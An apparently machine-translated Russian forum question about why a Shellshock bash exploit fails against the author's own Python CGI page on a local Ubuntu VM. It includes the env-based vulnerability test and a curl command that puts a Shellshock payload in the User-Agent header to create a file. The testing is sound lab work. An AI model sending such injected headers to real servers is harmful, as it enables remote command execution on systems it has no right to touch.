Не мог воспроизвести ошибку ShellShock локально

Я пытался воспроизвести ошибку Контузии на своих локальных 14,04 Ubuntu VM без любой удачи. Я знаю, что моя локальная версия удара все еще уязвима, потому что следующая команда распечатывает прокомментированную часть:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
# vulnerable
# this is a test

Моей текущей установкой является очень простой Python сценарий CGI, работающий на Apache2. Принятие моей виртуальной конфигурации хоста просто работает, вот мой сценарий Python в его всей славе:

#!/usr/bin/python
import os

val = os.environ.get('HTTP_USER_AGENT')

print "Content-type:text/html\r\n\r\n"
print "<html>"
print "<head>"
print "<title>Shellshocked!!</title>"
print "</head>"
print "<body>"
print "<h2>Hi world; ua=%s</h2>" % val
print "</body>"
print "</html>"

Я называю эту веб-страницу с помощью завихрения и следующей команды:

curl -H "User-Agent: () { :; }; touch ~/hacked.txt" http://localhost/cgi-bin/index.py

Вывод:

<html>
<head>
<title>Shellshocked!!</title>
</head>
<body>
<h2>Hi world; ua=() { :; }; touch ~/hacked.txt</h2>
</body>
</html>

Как Вы видите, нападение передается странице, но ничто не создается в корневом каталоге. Какие-либо подсказки относительно того, почему нападение не работает? Соответствующие детали о моей версии удара следующие:

adminuser@home:/bin$ bash --version
GNU bash, version 4.2.45(1)-release (x86_64-pc-linux-gnu)

Также я должен упомянуть что мой /bin/sh symlinked к /bin/dash в случае, если это имеет значение, хотя это также уязвимо, так как вышеупомянутый тест для уязвимости все еще работает.